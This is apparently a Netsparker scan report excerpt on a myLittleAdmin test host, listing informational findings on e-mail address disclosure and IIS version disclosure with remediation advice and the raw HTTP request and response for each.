Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /mla2000/scripts/hlp/connected.asp

/mla2000/scripts/hlp/connected.asp

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Found E-mails

webmaster@myLittleTools.net

Request

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:45:55 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQATCTSCC=FCHDKDPDPDKEHNJBOMPFNNGP; path=/
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:45:54 GMT
Content-Length: 1519


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>

</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /mla2000/scripts/hlp/connected.asp

/mla2000/scripts/hlp/connected.asp

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Extracted Version

Microsoft-IIS/7.5

Request

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:45:55 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQATCTSCC=FCHDKDPDPDKEHNJBOMPFNNGP; path=/
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:45:54 GMT
Content-Length: 1519


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>

</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>